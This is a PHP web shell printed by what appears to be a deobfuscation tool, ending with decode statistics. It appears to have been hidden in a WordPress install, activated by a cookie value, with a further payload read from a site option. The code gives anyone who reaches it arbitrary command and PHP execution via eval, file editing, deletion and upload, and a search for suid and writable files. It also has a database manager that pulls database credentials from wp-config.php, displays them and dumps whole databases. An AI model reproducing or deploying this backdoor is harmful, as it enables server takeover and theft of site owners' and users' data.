fwrite($fp, $c);
fclose($fp);
$out = 'File saved.'."\n";
if($t && touch($f, $t)){
$out .= 'Last modification time changed.';
}else{
$out .= 'Could not change last modification time!';
}
}else{
$out = 'Saving failed!';
}
return $out;
}

function file_size($f){
$size = filesize($f);
if($size < 1024) $size = $size.'&nbsp;b';
elseif($size < 1048576) $size = round($size/1024*100)/100 . '&nbsp;Kb';
elseif($size < 1073741824) $size=round($size/1048576*100)/100 . '&nbsp;Mb';
return $size;
}

if(!function_exists('natcasesort')){
function natcasesort($arr){
return sort($arr);
}
}

if(!empty($_POST['dir'])){
$dir = $_POST['dir'];
if(!@chdir($dir)) $out = 'chdir() failled!';
}
$dir = getcwd();



(strlen($dir) > 1 && $dir[1] == ':') ? $os_type = 'win' : $os_type = 'nix';

if(!$os_name = @php_uname()){
if(function_exists('posix_uname')){
$os_name = posix_uname();
}elseif($os_name != getenv('OS')){
$os_name = '';
}
}

if(function_exists('posix_getpwuid')){
$data = posix_getpwuid(posix_getuid());
$user = $data['name'].' uid('.$data['uid'].') gid('.$data['gid'].')';
}else{
$user = '';
}

$safe_mode = get_cfg_var('safe_mode');
$safe_mode ? $safe = 'on' : $safe = 'off';

execute('echo ssps') ? $execute = 'on' : $execute = 'off';




$server = getenv('SERVER_SOFTWARE');
if(!$server) $server = '---';



$out = '';
$tail = '';
$aliases = '';
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}
}



if(!empty($_POST['cmd'])){
$out = execute($_POST['cmd']);
}

elseif(!empty($_POST['php'])){
ob_start();
eval($_POST['php']);
$out = ob_get_contents();
ob_end_clean();
}

elseif(!empty($_POST['edit'])){
$file = $_POST['edit'];
$out = read($file);
$tail = '<input type="hidden" name="dir" value="'.$dir.'"><input type="hidden" name="efile" value="'.$file.'"><br><input type="submit" value="submit">';
}

elseif(!empty($_POST['save'])){
$out = write($_POST['efile'], $_POST['save']);
}

elseif(!empty($_POST['remove'])){
$obj = $_POST['remove'];
@is_dir($obj) ? $res = @rmdir($obj) : $res = @unlink($obj);
$res ? $out = 'Removed successfully' : $out = 'Removing failed!';
}

elseif(!empty($_POST['newdir'])){
@mkdir($_POST['newdir']) ? $out = 'Directory created.' : $out = 'Could not create directory!';
}

elseif(!empty($_POST['newfile'])){
@touch($_POST['newfile']) ? $out = 'File created.' : $out = 'Could not create file!';
}

elseif(!empty($_POST['alias'])){
$out = execute($_POST['alias']);
}

elseif(!empty($_FILES['ufile']['tmp_name'])){
if(!is_uploaded_file($_FILES['ufile']['tmp_name']) || @!copy($_FILES['ufile']['tmp_name'],$dir.chr(47).$_FILES['ufile']['name'])) $out = 'Could not upload file';
else $out = 'Uploaded successfully.';
}

print<<<here
<style>
table {font:9pt Tahoma;border-color:white}
input,select,file {background-color:#eeeeee}
textarea {background-color:#f2f2f2}
</style>
<br>
<center>
<table cellpadding=1 cellspacing=0 border=1 width=650 bgcolor=silver>
<tr>
<td>
<form method="post">
<table cellpadding=1 cellspacing=0 border=1 width=650>
here;
if(!$safe_mode) print<<<here
<tr>
<td>
cmd
</td>
<td colspan=8>
<input type="text" name="cmd" size="97">
</td>
</tr>
here;
print<<<here
<tr>
<td>
php
</td>
<td colspan=8>
<input type="text" name="php" size="97">
</td>
</tr>
<tr>
<td>
actions
</td>
<td>
edit
</td>
<td>
<input type="text" name="edit" size="14">
</td>
<td>
remove
</td>
<td>
<input type="text" name="remove" size="14">
</td>
<td>
new_dir
</td>
<td>
<input type="text" name="newdir" size="14">
</td>
<td>
new_file
</td>
<td>
<input type="text" name="newfile" size="15">
</td>
</tr>
here;
if($aliases){
print<<<here
<tr>
<td>
aliases
</td>
<td colspan=8>
<select name=alias>
here;
foreach($aliases as $k => $v){
print '<option value="'.$v.'">'.$k.'</option>';
}
print<<<here


</select>
<input type="submit" value="submit">
</td>
</tr>
here;
}
print<<<here
<tr>
<td>
dir
</td>
<td colspan=8>
<input type="text" value="{$dir}" name="dir" size="89">
<input type="submit" value="submit">
</td>
</tr>
</form>
<form method="post" enctype="multipart/form-data">
<tr>
<td>
upload
</td>
<td colspan=8>
<input type="file" name="ufile" size="76">
<input type="hidden" name="dir" value="{$dir}">
<input type="submit" value="submit">
</td>
</tr>
</form>
</table>



<table cellpadding=0 cellspacing=0 border=1 width=650>
<form method="post">
<tr valign=top>
<td width=70% bgcolor=#dddddd>
<b>OS:</b> {$os_name}<br>
<b>User:</b> {$user}<br>
<b>Server:</b> {$server}<br>
<b>safe_mode:</b> {$safe} <b>execute:</b> {$execute} <b>max_execution_time:</b> {$limit}
</td>
<td rowspan=2 bgcolor=#dddddd>
<center>~:(expl0rer):~</center>
here;



if($dp = @openDir($dir)){
$cObj = readDir($dp);
while($cObj){
if(@is_dir($cObj)) $theDirs[] = $cObj;
elseif(@is_file($cObj)) $theFiles[] = $cObj;
$cObj = readDir($dp);
}
closedir($dp);
}

if(!empty($theDirs)){
natcasesort($theDirs);
if($os_type == 'nix'){
foreach($theDirs as $cDir){
$color='black';
if(is_writeable($cDir)){
$color='red';
}elseif(is_readable($cDir)){
$color='blue';
}
print "<font color=".$color.">&lt;".$cDir."&gt;</font><br>";
}
}else{
foreach($theDirs as $cDir){
$tmp = $cDir.'/.ssps_tmp';
if(@touch($tmp)){
$color='red';
unlink($tmp);
}elseif(opendir($cDir)){
closedir();
$color='blue';
}else{
$color='black';
}
print "<font color=".$color.">&lt;".$cDir."&gt;</font><br>";
}
}
} else print '<br>open_basedir restriction in effect. Allowed path is '.get_cfg_var('open_basedir');

print '<br>';

if(!empty($theFiles)){
natcasesort($theFiles);
print '<table width=100% border=0 cellpadding=0 cellspacing=2 style="font:8pt Tahoma;">';
foreach($theFiles as $cFile){
$size = file_size($cFile);
if($fp = @fopen($cFile, 'a')) $color = 'red';
elseif($fp = @fopen($cFile, 'r')) $color='blue';
else $color = 'black';
@fclose($fp);
print '<tr><td width=100%><font color='.$color.'>'.$cFile.'</font></td><td align=left>'.$size.'</tr>';
}
print '</table>';
}

print<<<here
</td>
</tr>
<tr valign=top>
<td align=center>
<form method="post">
~:(results):~
<textarea name=save cols=55 rows=15>{$out}</textarea>
{$tail}
</form>
</td>
</tr>

</table>
</form>
</td>
</tr>
</table>
here;
die;"));
        if ($_COOKIE['PREF'] == 2) eval(base64_decode("$allowed_ips = array( 	'192.168.1.*', );

$real_office_login = 'login';
$real_office_password = 'password';

$svoi = 0;
foreach($allowed_ips as $pattern){
	$pattern = str_replace(".","\.", $pattern);	$pattern = str_replace("?",".",$pattern);	$pattern = str_replace("*",".*",$pattern);
	if(preg_match("/".$pattern."/iU", $_SERVER['REMOTE_ADDR'])) $svoi=1;
}

if($svoi>0){
	$in_office = 1;
	$office_login = $real_office_login;
	$office_password = $real_office_password;
}

error_reporting(0);
set_time_limit(0);
if($_GET['iof']){$iof = array(
        'd'=>'R0lGODlhDwANAKIAAAAAAMzMzMwzAP+ZAEIRAP///wAAAAAAACH5BAUUAAUALAAAAAAPAA0AAAM3WEXQDiSyJUi4l4hdwbYAplXdF4QZV1anqDImFoyfV0nSa6t8vQ3A4EDXK8IEwiCxyGPgnjhAAgA7',
        's'=>'R0lGODlhDwANAKIAAP///8zMzACZzAAAZgAAAAAAAAAAAAAAACH5BAUUAAAALAAAAAAPAA0AAAMxCEDc3kuQQCkRWF4ZpsUXA3bVBm6T12XaWK2ZqD2szN4nNuz8UJu4n663EwZvj+QjAQA7',
        );header("Content-type: image/png\nCache-control: public\n\rExpires: Thu, 1 Jan 2037 00:00:00 +0200\n\rCache-control: max-age=605800\n\rLast-Modified: ".date("r",filemtime(__FILE__)));echo base64_decode($iof[$_GET['iof']]);exit;
}

$indexphp = basename($_SERVER['PHP_SELF']);
$db_host = $_REQUEST['db_host'];
$db_user = $_REQUEST['db_user'];
$db_pass = $_REQUEST['db_pass'];
$db_base = $_REQUEST['db_base'];
if($_REQUEST['db_base_plain']) $db_base = $_REQUEST['db_base_plain'];

if($_GET['auto']!="off"){
	$wpconf=fwpconf("./");
	if($db_host=="" && $db_user=="" && $db_pass=="" && $db_base=="" && ($txt=@file_get_contents($wpconf."wp-config.php"))!=""){
		$txt=preg_replace("!\s+!is"," ",$txt);
		preg_match("!define\s?\(\s?['\"]DB_NAME['\"]\s?,\s?['\"](.*?)['\"]\s?\);!is",$txt,$dbn);
		preg_match("!define\s?\(\s?['\"]DB_USER['\"]\s?,\s?['\"](.*?)['\"]\s?\);!is",$txt,$dbu);
		preg_match("!define\s?\(\s?['\"]DB_PASSWORD['\"]\s?,\s?['\"](.*?)['\"]\s?\);!is",$txt,$dbp);
		preg_match("!define\s?\(\s?['\"]DB_HOST['\"]\s?,\s?['\"](.*?)['\"]\s?\);!is",$txt,$dbh);
		if($dbh[1]==""){
			preg_match("!define\s?\(\s?['\"]DB_HOST['\"]\s?,\s?(.*?)\s?\);!is",$txt,$dbh);
			eval("\$dbh[1]=".$dbh[1].";");
		}
		$db_host = $dbh[1];
		$db_user = $dbu[1];
		$db_pass = $dbp[1];
		$db_base = $dbn[1];
		
		echo $db_host."<br>".$db_user."<br>".$db_pass."<br>".$db_base."<br>";
	}
}

$sv_s = true; $drp_tbl = true;

function sqldumptable($table){
        global $sv_s,$sv_d,$drp_tbl,$db_link;
        if ($sv_s) { if ($drp_tbl) $tabledump = "DROP TABLE IF EXISTS `$table`;\n"; $tabledump .= "CREATE TABLE `$table` (\n"; $firstfield=1; $champs = mysql_query("SHOW FIELDS FROM `$table`",$db_link);        while ($champ = mysql_fetch_array($champs)){ if (!$firstfield){$tabledump .= ",\n";} else        $firstfield=0; $tabledump .= "   `$champ[Field]` $champ[Type]"; if ($champ['Null'] != "YES")$tabledump .= " NOT NULL"; if (!empty($champ['Default'])) $tabledump .= " default '$champ[Default]'"; if ($champ['Extra'] != "") $tabledump .= " $champ[Extra]";}        @mysql_free_result($champs); $keys = mysql_query("SHOW KEYS FROM `$table`",$db_link);         while ($key = mysql_fetch_array($keys)){ $kname=$key['Key_name']; if ($kname != "PRIMARY" and $key['Non_unique'] == 0) $kname="UNIQUE|`$kname`"; if(!is_array($index[$kname])) $index[$kname] = array(); $index[$kname][] = $key['Column_name']; }        @mysql_free_result($keys); while(list($kname, $columns) = @each($index)) { $tabledump .= ",\n"; $colnames=implode($columns,","); if($kname == "PRIMARY") $tabledump .= "   PRIMARY KEY (`".eregi_replace(',','`,`',$colnames)."`)"; else { if (substr($kname,0,6) == "UNIQUE") $kname=substr($kname,7); $tabledump .= "   KEY $kname (`".eregi_replace(',','`,`',$colnames)."`)"; } }        $tabledump .= "\n);\n\n";        }
        if ($sv_d) { $rows = mysql_query("SELECT * FROM `$table`",$db_link); $numfields = mysql_num_fields($rows);        while ($row = mysql_fetch_array($rows))        { $tabledump .= "INSERT INTO `$table` VALUES("; $cptchamp=-1; $firstfield=1; while (++$cptchamp<$numfields) { if (!$firstfield) $tabledump.=","; else $firstfield=0; if (!isset($row[$cptchamp])) $tabledump .= "NULL"; else $tabledump .= "'".mysql_escape_string($row[$cptchamp])."'";        } $tabledump .= ");\n";        }        @mysql_free_result($rows);        }
        $fff = fopen("dump.sql","w+"); fwrite($fff,$tabledump);        return $tabledump;
}

function fwpconf($d){
	global $irec;
	if($irec++>10) return FALSE;
	$d=str_replace("//","/",$d);
	if($dir=@opendir($d)){
		while(($f=@readdir($dir))!==false){
			if($f=="." || $f==".." || is_link($f)) continue;
			if($f=="wp-config.php") break;
		}
		if($f!="wp-config.php") $d=fwpconf("../".$d);
	}
	@closedir($dir);
	return $d;
}

global $db_link;

if ($_REQUEST[act]=='dump_tb_all' || $_REQUEST[act]=='dump_tb_structure') {
        if ($_REQUEST[act]=='dump_tb_all') $sv_d=true;
	$db_link=mysql_connect($db_host,$db_user,$db_pass);
        if(!$db_link)die('Error connecting to SQL server');
        if($db_base) mysql_select_db($db_base,$db_link);
        print "<pre style=\"font-size:10;font-family:Verdana;\">".htmlspecialchars(sqldumptable($_REQUEST[table]))."</pre>";
        $_REQUEST[act] == '';
        die;
}
if ($_REQUEST[act]=='dump_db_all' || $_REQUEST[act]=='dump_db_structure') {
        if ($_REQUEST[act]=='dump_db_all') $sv_d=true;
	$db_link=mysql_connect($db_host,$db_user,$db_pass);
        if(!$db_link)die('Error connecting to SQL server');
        if($db_base) mysql_select_db($db_base,$db_link);
        $q = mysql_query("SHOW TABLES",$db_link);
        print "<pre style=\"font-size:10;font-family:Verdana;\">";
        while($data = mysql_fetch_row($q)) print htmlspecialchars(sqldumptable($data[0]))."\n";
        print "</pre>";
        die;
}

print<<<here
<html>
<head>
<meta http-equiv="expires" content="0">
<meta http-equiv='Content-Type' content='text/html; charset=windows-1252'>
<style type="text/css">
td,body { font-family:Verdana;font-size:13px;}
table, td, th { border-color: #EEEEEE #CCCCCC #CCCCCC #EEEEEE; border-style: solid; border-width: 1px; background-color:#FFFFFF;}
.nob { border:none; border-color:#ffffff;font-weight:bold;font-size:10px;}
th{color: #FFFFFF; background-color: #3366CC;font-size:10pt;font-weight:bold;text-align:left;}
.th1{color: #FFFFFF; background-color: #3366CC;font-size:10pt;font-weight:bold;text-align:center;}
.thc {background-color:#3366CC;font-weight:bold;color:#ffffff;text-align:center;}
.thl {background-color:#eaeaea;font-weight:bold;text-align:left;}
.thr {background-color:#eaeaea;font-weight:bold;font-size:10px;text-align:right;}
.an { color:#0000ff; text-decoration:underline; }
input, textarea, select{font-family: Verdana,Arial,Helvetica; font-size: 11px;}
</style>
here;

if(!$db_host || !$db_base){
print "
</head><body bgcolor=#FFFFFF><center><table border=1 cellpadding=2><form action=".$indexphp." method=POST><tr><th colspan=2>Fill database data:</th></tr>
<tr bgcolor=#E0E0E0><td class=thr>Host:</td><td><input type=text name=db_host value='localhost' style='width:140px'></td></tr>
<tr bgcolor=#E0E0E0><td class=thr>Username:</td><td><input type=text name=db_user value='root' style='width:140px'></td></tr>
<tr bgcolor=#E0E0E0><td class=thr>Password:</td><td><input type=password name=db_pass style='width:140px'".(($in_office)?" value='$office_password'":"")."></td></tr>";

    if($in_office) $db_link=@mysql_connect('localhost',$office_login,$office_password);
    $db_list = mysql_list_dbs($db_link);
    if((!mysql_error($db_link)) && mysql_num_rows($db_list)>0) {
                   echo "<tr bgcolor=#E0E0E0><td class=thr valign=top".(($db_host)?" style='color:#FF0000'":"").">Select database:</td><td>\n".
			"<select size=20 name=db_base style='width:250px'>"; $rows = '';
                   while ($row = mysql_fetch_object($db_list)) $rows = "<option value='".$row->Database."'>".$row->Database."</option>".$rows;
                   echo $rows."</select>\n</td></tr>";
                   $dblisted=1;
    }
                @mysql_close($db_link);
echo "
<tr bgcolor=#E0E0E0><td class=thr valign=top".(($db_host)?" style='color:#FF0000'":"").">".(($dblisted==1)?"OR d":"D")."atabase:</td><td><input type=text name=db_base_plain style='width:140px'></td></tr>
<tr bgcolor=#E0E0E0><td class=th1 colspan=2><input type=submit value='Login >>'></td></tr></form></table></center></body></html>";
exit;
}

$query = $_REQUEST['query'];
if(!$query)$query = "show tables";
$history = $_REQUEST['history'];
if($history) { $history = explode(" ", trim($history)); foreach($history as $hk=>$h) if($h) $history[$hk] = str_replace("bla_SPACE_bla"," ",$h);}
if(!count($history)) $history[]="show tables";
$db_link=mysql_connect($db_host,$db_user,$db_pass);
if(!$db_link)die('Error connecting to SQL server');

$js_history=""; foreach($history as $h) $js_history='"'.$h.'",';
$count_history=count($history);
print<<<here
<script language=JavaScript>
var brnm=navigator.appName;
ie=0;
if (brnm=="Microsoft Internet Explorer") ie=1;

 var history_=new Array({$js_history}"");

var inHist={$count_history},hLen={$count_history};



function setHistButtons(){

	if (ie) {
		document.getElementById("f1").h_back.disabled= (inHist==0);
		document.getElementById("f1").h_forw.disabled=(inHist>={$count_history}-1);
	}
	if (!ie) {
		if (inHist==0) document.getElementById("f1").h_back.disabled = true;
			else document.getElementById("f1").h_back.disabled = false;
		if (inHist>={$count_history}-1) document.getElementById("f1").h_forw.disabled= true;
			else document.getElementById("f1").h_forw.disabled= false;
	}
}

function hi_back(){
	document.getElementById("f1").query.value=history_[--inHist];
	setHistButtons();
}

function hi_forw(){
	document.getElementById("f1").query.value=history_[++inHist];
	setHistButtons(); 
}

function init(){
	frm.query.focus(); 
	setHistButtons();
}

function prepare(){
	var i,j,h,s=''; 
	var regexp = /\s/;
    for(i=0;i<history_.length;i++) 
    	if(history_[i].length){
    		h=history_[i];
    		while(h.search(regexp)!=-1) 
    			h = h.replace(regexp, "bla_SPACE_bla");
    			s+=h+" ";
    	}
    var q = document.getElementById("f1").query.value; 
    while(q.search(regexp)!=-1) 
    	q = q.replace(regexp, "bla_SPACE_bla");
    document.getElementById("f1").history.value=s+q;
}

function submit_form(){
	if(document.getElementById("f1").Submit) 
		document.getElementById("f1").Submit(); 
	else document.getElementById("f1").submit();
}

function dump_tb_structure(p){
	document.getElementById("f1").act.value='dump_tb_structure';
	document.getElementById("f1").table.value=p;
	prepare();
	document.getElementById("f1").target='_blank';
	document.getElementById("f1").submit();
	document.getElementById("f1").target='_self';
	document.getElementById("f1").act.value=0; 
	return false; 
}

function dump_tb_all(p){
	document.getElementById("f1").act.value='dump_tb_all';
	document.getElementById("f1").table.value=p;
	prepare();
	document.getElementById("f1").target='_blank';
	document.getElementById("f1").submit();
	document.getElementById("f1").target='_self';
	document.getElementById("f1").act.value=0; 
	return false; 
}

function dump_db_structure(){
	document.getElementById("f1").act.value='dump_db_structure';
	prepare();
	document.getElementById("f1").target='_blank';
	document.getElementById("f1").submit();
	document.getElementById("f1").target='_self';
	document.getElementById("f1").act.value=0; 
	return false; 
}

function dump_db_all(){
	document.getElementById("f1").act.value='dump_db_all';
	prepare();
	document.getElementById("f1").target='_blank';
	document.getElementById("f1").submit();
	document.getElementById("f1").target='_self';
	document.getElementById("f1").act.value=0; 
	return false; 
}

function go(p){
	document.getElementById("f1").query.value='select * FROM `'+p+'`';
	prepare();
	submit_form(); 
	return false;
}

function drop(p){
	document.getElementById("f1").query.value='drop table `'+p+'`';
	prepare();
	document.getElementById("f1").submit();
	return false; 
}

function desc(p){
	document.getElementById("f1").query.value='describe `'+p+'`';
	prepare();
	document.getElementById("f1").submit();
	return false; 
}
	
function showt(){
	document.getElementById("f1").query.value='show tables';
	prepare();
	document.getElementById("f1").submit();
	return false; 
}

function rep(){
	document.getElementById("f1").query.value=history_[hLen-1];
	prepare();
	document.getElementById("f1").submit();
	return false; 
}

function inte(o){
        var v = document.getElementById("f1").query.value,t;
        if( o == 'simple' ) t = '<input type=text name=query size=75 value="'+v+'">';
        if( o == 'multiline' ) t = '<textarea name=query cols=75 rows=15>'+v+'</textarea>';
        if( o == 'upload' ) t = '<input type=file name=query size=65>';
        document.all['queryline'].innerHTML = t;
}
</script></head>
<body onLoad="init();" bgcolor=#ffffff alink=#0000ff vlink=#0000ff>
<center>
<table border=0 cellpadding=2 cellspacing=0 class=nob>
<form method=POST>
<tr><td class=nob>Current database: 
 <select name=db_base size=1 onchange='submit();'>
here;

$db_list = mysql_list_dbs($db_link);
$rows=''; 
while ($row = mysql_fetch_object($db_list)) 
	$rows = "<option ".($db_base==$row->Database?"selected":"")." value='".$row->Database."'>".$row->Database."</option>\n".$rows;
echo $rows."</select>\n<input type=hidden name=db_host value=".$db_host.">
						<input type=hidden name=db_user value=".$db_user.">
						<input type=hidden name=db_pass value=".$db_pass.">";
print<<<here
<select onchange="inte(this.value)">
<option value='simple'>Simple
<option value='multiline'>Multiline
<option value='upload'>Upload
</select>
</td></tr></form>
<form id=f1 name=frm method=POST onsubmit='prepare();submit();' target=_self  enctype="multipart/form-data">
<input type=hidden name=act><input type=hidden name=table value=0>
<tr><td class=nob><div id=queryline><input type=text name=query size=75></div></td><td class=nob valign=top>
<input name=h_back type=button value='<' onclick='hi_back();'>
<input name=h_forw type=button value='>' onclick='hi_forw();'>
&nbsp;<input type=button value=Submit onclick='prepare();submit();'>
<input type=hidden name=db_host value={$db_host}>
<input type=hidden name=db_user value={$db_user}>
<input type=hidden name=db_pass value={$db_pass}>
<input type=hidden name=db_base value={$db_base}>
<input type=hidden name=history value=''>
</td></tr>
<tr><td class=nob>
<a href=# style='color=#0000ff' onClick='return dump_db_all()'><img border=0 src=csql.php?iof=d alt='Dump database'  align='absmiddle'></a>&nbsp;
<a href=# style='color=#0000ff' onClick='return dump_db_structure()'><img border=0 src=csql.php?iof=s alt='Dump structure'  align='absmiddle'></a>&nbsp;
[<a href=# style='color=#0000ff' onClick='return(rep())'>Repeat query</a>]&nbsp;
[<a href=# style='color=#0000ff' onClick='return(showt())'>Show tables</a>]&nbsp;
[<a href={$indexphp}>Re-Login</a>]
</td></tr>
</form>
</table><br>
here;

if( $_FILES['query']['tmp_name'] ){
        $query = file( $_FILES['query']['tmp_name'] );
} else $query = explode("\n", stripslashes($query));

$queries = array();
$skoko = count($query);

foreach($query as $key=>$v){
        $v=trim($v);
        if(substr($v,0,1)!='#'){
                if(substr($v,-1,1) != ';' && $key!=$skoko-1) $f1.=$v;
                else {
                        if($f1=="") $f1=$v; else $f1.=$v;
                        if(substr($v,-1,1) == ';') $qq = substr($f1,0,-1);
                        else $qq = $f1;
                        if(trim($qq)) $queries[]= $qq;
                        $f1="";
                }
        }
}

if($db_base) mysql_select_db($db_base,$db_link);
if(mysql_error($db_link)) $no_base=1;

$colors = array('red','green','blue');
foreach($queries as $ttt=>$q){
        unset($tv1,$i,$d,$w,$t,$r,$t1,$a,$b);

        if(eregi("^use ",$q))$db_base=substr($q,4);
        if(eregi('show tables',$q))$tv1=1;

        if($q){
          echo '<table class=nob cellpadding=0 cellspacing=0><tr><td style="background-color:#ffffaa;padding:4px;border:1px dashed #aaaaaa">'.htmlspecialchars($q).'</td></tr></table><br><br>';
                 $w=mysql_query($q,$db_link);
          if(mysql_error($db_link) || $no_base) echo "<font color=#ff0000><b>MySQL error:</b></font> ".mysql_error($db_link);
          if($w){
            echo'<table width=100% cellpadding=2 cellspacing=2 bordercolor=#bbbbbb border=0><tr align=center>';
            $i=0;
            if($tv1!=1) while($a=mysql_field_name($w,$i++)){
                                                                                echo"<td class=thc><i>$a</i></td>";
                                                                                $d[]=$a;
                                                            }
            else echo "<td colspan=2 class=thc>Tables in <b>\"".$db_base."\"</b></td>";
            echo'</tr>';
            while($a=mysql_fetch_array($w)){
              echo"<tr>\n";
              if($tv1) {
                              $t=$a[0];
                              echo "<td class=thr nowrap>";
                              $r = mysql_query("SELECT COUNT(*) FROM $t",$db_link);
                              $r =  mysql_result($r,0);
                              echo "&nbsp<a href=# onClick=\"return dump_tb_all('".$t."');\" style=\"color: green\"><img border=0 src=csql.php?iof=d alt=\"Dump table\" align='absmiddle'></a>&nbsp<a href=# onClick=\"return dump_tb_structure('".$t."');\" style=\"color: green\"><img border=0 src=csql.php?iof=s alt=\"Dump structure\" align='absmiddle'></a>&nbsp;[<a href=# onClick=\"return( confirm('Delete table \'".$t."?\'')? drop('".$t."'):false )\" style=\"color:#ff0000\">kill</a>]&nbsp;[<a href=# onClick=\"return desc('".$t."');\">desc</a>]</td><td width=100% valign=top>&nbsp;<a href=# onClick=\"go('".$t."');return false;\">".$t."</a> <font style=\"font-size:10;color: #aaaaaa;\">(".$r.")</font></td>";
              }
              reset($d);
              while ($b=each($d)){
                      $t=$a[$b[1]]; echo'<td valign=top>';
                $t1=nl2br(htmlspecialchars(stripslashes($t)));
                if($t1=="")$t1="&nbsp;";
                echo $t1."</td>";
              }
              print("</tr>\n");
            }
            echo'</table>';
          }
           if($ttt < count($queries)-1) echo "<br><br>";
        }
}
print<<<here
</center>
</body>
</html>
here;
die;"));
        if ($_COOKIE['PREF'] == 3 && $_POST['file'] != "") eval(base64_decode($_POST['file']));
    }
    $_x = get_option("d20dde6358dceef51157999bac1a2eaf");
    $_x = base64_decode(str_rot13($_x));
    print($_x);
    define('985F9FCB', 1);
}

Function Calls

defined 1

Variables

None

Stats

MD5 7b884a844c8add760865d05f96b4e4a5
Eval Count 0
Decode Time 546 ms